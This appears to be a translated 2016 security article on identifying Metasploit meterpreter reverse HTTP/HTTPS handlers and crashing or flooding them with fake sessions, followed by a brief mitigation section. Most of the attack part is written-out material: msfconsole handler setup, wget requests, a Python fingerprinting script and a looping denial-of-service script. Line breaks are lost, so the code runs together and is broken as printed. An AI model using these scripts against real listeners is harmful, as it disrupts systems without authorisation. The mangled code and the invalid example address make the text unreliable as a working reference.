Identifies and attacks meterpreter's http or https handler

Identifies and attacks meterpreter's http or https handler

This article will show how to identify the https or http handler of meterpreter, and how to launch DoS attacks (by setting fake sessions between attackers and listeners ).

Summary:

1. Request a specific file through http get and check that the file content contains strings such as "core_patch_url" to identify the reverse Handlers.

By sending an exception GET request, the Handler or listener cannot be processed and crashed. the Listener can be spoofed into a meterpreter session that is being opened or forced to stop receiving sessions.

2. Request a special file to make handler mistakenly think that a meterpreter session is about to be connected, and then stop receiving other sessions to be connected.

Download:

Reverse Handler Dos Script: https://gist.github.com/x-42/10e1ce596a7cb27877b6

Reverse Handler detection Script: https://gist.github.com/x-42/b663a0af20cda4aa0683

First, set the http handler port and open it as you visit the website:

[*] [2016.01.27-14:59:21] Listening for incoming connections on 0.0.0.0:27170 (windows/meterpreter/reverse_http)...[*] [2016.01.27-14:59:21] Started as job # 0[*] [2016.01.27-14:59:21] Started HTTP reverse handler on http://0.0.0.0:27170/[*] [2016.01.27-14:59:21] Starting the payload handler...

 

 

There are actually many files. By requesting different files, unexpected things can occur in the listener.

We can access some files to confirm that the listener is on this server, or forge a bounce meterpreter to be connected.

Next, run a handler for reverse https-based connections to meterpreter:

use exploit/multi/handlerset ExitOnSession falseset LHOST 666.666.666.666set LPORT 65535set PAYLOAD windows/meterpreter/reverse_httpsexploit -j

Request the chpwd.htm file after successful renewal.

$ wget -qO- --no-check-certificate https://666.666.666.666/chpwd.htm?core_patch_url??/LUDZ6djujGbWvte_gMomnQm7EQVgW7RJfg3xpGoDUgRe_SdhLJBud68viiiDN1UsrniHZsjxLn9qYOo4YJIIU6K5ZnhNsuoGoPuWqKpQQVtxU6L4EQg8ka9cZ4aJ-/

 

 

 

You can see the contents in the chpwd.htm file. The string "core_patch_url" is displayed, followed by a bunch of random characters. "Core_patch_url" is our fingerprint.

On the listenerside, we can see the following log (when requesting chpwd.htm ):

192.168.99.3:53465 (UUID: f376e70ee8e1264d/x86=1/windows=1/2016-01-27T07:00:04Z) Redirecting stageless connection from /chpwd.htm with UA 'Mozilla/5.0 (Windows NT 10.0; WOW64

We can also request the "blank. php" file. After opening the file, we can find that it is an executable file based on MS Windows, but the suffix is changed to php for unknown reasons.

 

 

 

On the listener side, we see the following log (when requesting blank. php ):

 

 

 

The request to blank. php seems to trigger the python phase. In fact, it is to prepare to receive the meterpreter SESSION (because it is illegal, it will be turned off soon)

From the preceding meterpreter logs, we can construct a "fake" session to allow Handler to process (or terminate the session in advance ). In essence, the handler can continuously construct "fake" sessions, and thus the handler cannot process the connections of "real" sessions.

In addition to the mongochpwd.htm and blank. php files, we can also access the following files.

 

 

 

 

 

The python script for fingerprint recognition is as follows:

#!/usr/bin/env python# checks to see if a port is running a metasploit reverse https listener service.# checks a url for the existence of a file called "chpwd.htm" which contains "core_path_url" in its contents.# Usage: python finger.py http[s]://ip:portimport osimport urllib2import sysclass x:r = '\033[91m'b = '\033[0m'if len(sys.argv) != 2:print 'Usage: python %s [http(s)://ip:port]' % sys.argv[0]    exit()target_ip = sys.argv[1]finger = os.system("wget -qO- --no-check-certificate " + target_ip + "/chpwd.htm" + " --output-document=/tmp/handler_finger")with open('/tmp/handler_finger', 'r') as content:    content = content.read()if "core_patch_url" in content:print x.r + "*** Looks like a Metasploit Handler is listening on " + target_ip + " ***" + x.bif "core_patch_url" not in content:print x.r + "Not a Metasploit Listener."

This is a Dos script that constantly requests the blank. php file, so that handler cannot process valid requests.

 #!/usr/bin/env pythonimport osimport sysif len(sys.argv) != 2:print 'Usage: python %s [http(s)://ip:port]' % sys.argv[0]    exit()ip = sys.argv[1]def dos():for i in range(1):        os.system("wget -qO- --no-check-certificate " + ip + "/blank.php" + " --output-document=/tmp/blank.php")while True:print '.'*30dos()print "Press CTRL-Z to DoS the Listener" # This is required to kill the connection prematurely

Mitigation

By default, listener is configured to allow payload of any UUID to connect. Set "IgnoreUnknownPayloads true" in your configuration script or msfconsole. However, payload and listener must be configured as "Paranoid Mode ". For more information, see here.

Alternatively, set iptables to only allow connections from the target ip Address:

iptables -I INPUT -p tcp -m tcp -s 0.0.0.0/0 --dport $LISTENER_PORT -j DROPiptables -I INPUT -p tcp -m tcp -s $SHELL_IP --dport $LISTENER_PORT -j ACCEPT